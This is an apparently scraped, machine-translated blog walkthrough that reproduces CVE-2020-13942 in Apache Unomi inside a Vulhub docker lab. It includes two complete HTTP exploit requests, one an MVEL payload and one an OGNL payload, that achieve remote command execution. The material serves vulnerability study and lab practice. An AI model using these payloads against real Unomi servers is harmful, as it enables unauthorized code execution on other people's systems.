当前位置:网站首页>Vulhub vulnerability recurrence 71_ Unomi
Vulhub vulnerability recurrence 71_ Unomi
2022-07-06 05:17:00 【Revenge_ scan】
CVE-2020-13942_ Apache Unomi Remote expression Code Execution Vulnerability
Vulnerability Details
Apache Unomi It's a standard based customer data platform (CDP,Customer Data Platform), Used to manage information such as online customers and visitors , To provide a personalized experience that meets visitor privacy rules . stay Apache Unomi 1.5.1 In previous versions , There is an expression injection vulnerability , A remote attacker can use MVEL and OGNL Expression can execute any command on the target server .
Reference link :
-https://www.checkmarx.com/blog/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/
- https://github.com/eugenebmx/CVE-2020-13942
Environment building
shooting range :192.168.4.10_Ubuntu
Run the following command to start a Apache Unomi 1.5.1 Server for :
#docker-compose up -d
After the environment starts , adopt `http://your-ip:8181` or `https://your-ip:9443` You can access Unomi Of API.
Loophole recurrence
adopt 8181 and 9443 Both ports can trigger vulnerabilities , The following 8181 For example .
1. adopt MVEL Expressions execute arbitrary commands :
```
POST /context.json HTTP/1.1
Host: localhost:8181
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 483
{
"filters": [
{
"id": "sample",
"filters": [
{
"condition": {
"parameterValues": {
"": "script::Runtime r = Runtime.getRuntime(); r.exec(\"touch /tmp/mvel\");"
},
"type": "profilePropertyCondition"
}
}
]
}
],
"sessionId": "sample"
}
```
2. adopt OGNL Expressions execute arbitrary commands :
```
POST /context.json HTTP/1.1
Host: localhost:8181
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 1064
{
"personalizations":[
{
"id":"gender-test",
"strategy":"matching-first",
"strategyOptions":{
"fallback":"var2"
},
"contents":[
{
"filters":[
{
"condition":{
"parameterValues":{
"propertyName":"(#runtimeclass = #this.getClass().forName(\"java.lang.Runtime\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\"getRuntime\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\"exec\")}.{? #this.getParameters()[0].getType().getName().equals(\"java.lang.String\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\"touch /tmp/ognl\"))",
"comparisonOperator":"equals",
"propertyValue":"male"
},
"type":"profilePropertyCondition"
}
}
]
}
]
}
],
"sessionId":"sample"
}
```
Into the container , Visible command executed successfully :
边栏推荐
- Postman pre script - global variables and environment variables
- Collection + interview questions
- [leetcode daily question] number of enclaves
- Nacos TC setup of highly available Seata (02)
- Raspberry pie 3.5-inch white screen display connection
- 图论的扩展
- 图数据库ONgDB Release v-1.0.3
- GAMES202-WebGL中shader的编译和连接(了解向)
- 驱动开发——HelloWDM驱动
- Pix2pix: image to image conversion using conditional countermeasure networks
猜你喜欢
SQLite add index
The ECU of 21 Audi q5l 45tfsi brushes is upgraded to master special adjustment, and the horsepower is safely and stably increased to 305 horsepower
Codeforces Round #804 (Div. 2) Editorial(A-B)
Yyds dry inventory SSH Remote Connection introduction
Rce code and Command Execution Vulnerability
Yolov5 tensorrt acceleration
Pointer classic written test questions
Fluent implements a loadingbutton with loading animation
[leetcode daily question] number of enclaves
Zynq learning notes (3) - partial reconfiguration
随机推荐
图论的扩展
GAMES202-WebGL中shader的编译和连接(了解向)
Imperial cms7.5 imitation "D9 download station" software application download website source code
2021robocom robot developer competition (Preliminary)
In 2022, we must enter the big factory as soon as possible
Knowledge points of circular structure
Application of Flody
注释、接续、转义等符号
Unity gets the width and height of Sprite
Hometown 20 years later (primary school exercises)
Acwing week 58
组播和广播的知识点梳理
Nestjs配置文件上传, 配置中间件以及管道的使用
Configuration file converted from Excel to Lua
Cve-2019-11043 (PHP Remote Code Execution Vulnerability)
HAC集群修改管理员用户密码
[lgr-109] Luogu may race II & windy round 6
Codeforces Round #804 (Div. 2)
[untitled]
Sorting out the knowledge points of multicast and broadcasting